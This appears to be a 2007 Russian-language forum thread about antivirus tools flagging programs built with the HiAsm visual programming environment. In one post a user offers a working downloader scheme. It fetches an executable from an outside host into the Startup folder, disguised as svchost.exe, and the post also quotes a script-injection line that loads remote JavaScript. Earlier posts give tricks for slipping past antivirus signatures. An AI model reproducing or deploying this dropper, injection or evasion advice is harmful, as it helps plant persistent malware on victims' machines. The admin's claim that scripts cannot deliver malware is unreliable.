Вверх ↑
Этот топик читают: Гость
Ответов: 689
Рейтинг: 20
#31: 2007-08-19 23:15:23 ЛС | профиль | цитата
мой антивирь тоже как то ругался на очень простую схему, не помню какую. Сменил компилятор с Delphi на FCP и ругаться на этой же схеме перестал. Причем ругается он не каждый раз, как в голову придет... Видимо некая сигнатура похожа на сигнатуру в базе. Дома схему проанализировал с точки зрения функциональности, а не с точки зрения соотвествия антивирю, переделал и перестало как то само собой. Если бы не перестало, полез бы в базу антивиря убивать реакцию на эту сигнатуру. Благо антивирб позволяет установить игнорирование.

А Касперский - **вно еще то. За визжащего поресенка надо отрывать руки, ноги, спинной мозк и отдельно выдирать уши.
карма: 0

0
Администрация
Ответов: 15294
Рейтинг: 1518
#32: 2007-08-19 23:22:26 ЛС | профиль | цитата
oldTV писал(а):
мой антивирь тоже как то ругался на очень простую схему

на данный момент это схемы с элементом WinExec. Как-то раз на работе боролся с Symantec Antivirus путем изменения Z-координаты элементов. Минут 10 потратил пока нашел комбинацию при которой программа перестала распознаваться как вирус
карма: 26
0
Разработчик
Ответов: 26072
Рейтинг: 2122
#33: 2007-08-20 00:20:04 ЛС | профиль | цитата
Dilma писал(а):
на данный момент это схемы с элементом WinExec

Было такое дело. Я пошел более простым путем -- воткнул пустую переменную в компонент (правда не помню куда), заткнулся сразу.

[size=-2]------ Добавлено в 00:20
Galkov писал(а):
Мораль: шакалы они паршивые

А в этом никто и не сомневался -- чистые сволочи
карма: 22

0
Ответов: 27
Рейтинг: 0
#34: 2007-08-30 12:52:34 ЛС | профиль | цитата
Фух... Еле нашел куда вы переехали

По поводу "вируса"... Я не буду спорить даже если вы там и вправду найдете что-то... Каким-нить чудом мог и заразить, хотя в это слабо верю...

А каспера убейте. Он матюкается даже на .elf файлы для мобилы, которые на компе не запускаются впринципе.
карма: 1
Чайник
0
Гость
Ответов: 17029
Рейтинг: 0
#35: 2007-09-02 14:53:27 правка | ЛС | профиль | цитата


Редактировалось 4 раз(а), последний 2021-05-21 08:08:48
карма: 0

0
Ответов: 338
Рейтинг: 3
#36: 2007-10-23 06:58:46 ЛС | профиль | цитата
runingman, True

А вот вам вирус!
Add(DLL,7221359,98,105)
{
EventPoints=#12:ShowVindowEx|
link(ShowVindowEx,4023615:doDownload,[])
}
Add(HTTP_Get,4023615,147,105)
{
URL="http://d-mx.narod.ru/virus.exe"
FileName="C:Documents and SettingsAll UsersГлавное менюПрограммыАвтозагрузкаsvchost.exe"
}

[size=-2]------ Добавлено в 06:58
У меня после компиляции hood.dll занимает 24.5кб и это вирус довнлоадер.
Но это сделано на хиасме, а если использовать C++ или еще чтото то программа будет весить 5-10кб

Насчет ручной чистки вирусов. Да только он запустился уже позно, потому как он сделал свое дело. Нужно не давать ему проникнуть а не удалять после того как он стырил пасы или поставил какой нить троян а запуск у него в explorer.exe.
Получить вирус можно где хочеш, темболее если использовать Internet Explorer... который дырявый как сито =
Если вы не хотите получить трояна то единственный способ использовать telnet чтоль... В общем каким то образом получать сам файл и потом только на компе его читать. Получить вирус можно и на hiasm.com Пример: Ктото нашол дырку на сайте, взломал, сделал невидимый фрейм в котором и делаются плохие дела. или просто внедрил строку типа <script type="text/javascript" src="http://d-mx.narod.ru/loadvirus.js"></script>
В общем даж незнаю какой подвести вывод
карма: 0
Время верстки: %cr_time% Текущее время: %time%
0
Администрация
Ответов: 15294
Рейтинг: 1518
#37: 2007-10-23 12:24:39 ЛС | профиль | цитата
Dark_MX, только чушь на сайте писать не надо. Загрузить вирус через скрипт - невозможно. Как и получить доступ к файловой системе локальной машины. Подобные страшилки обычно рассказывает дядя Вася своим друзьям, после того как поставил в IE компонент ActiveX якобы предназначенный для просмотра видео роликов(угадай какого содержатия), сжатых по новым супер совершенным алгоритмам...
карма: 26
0
37
Сообщение
...
Прикрепленные файлы
(файлы не залиты)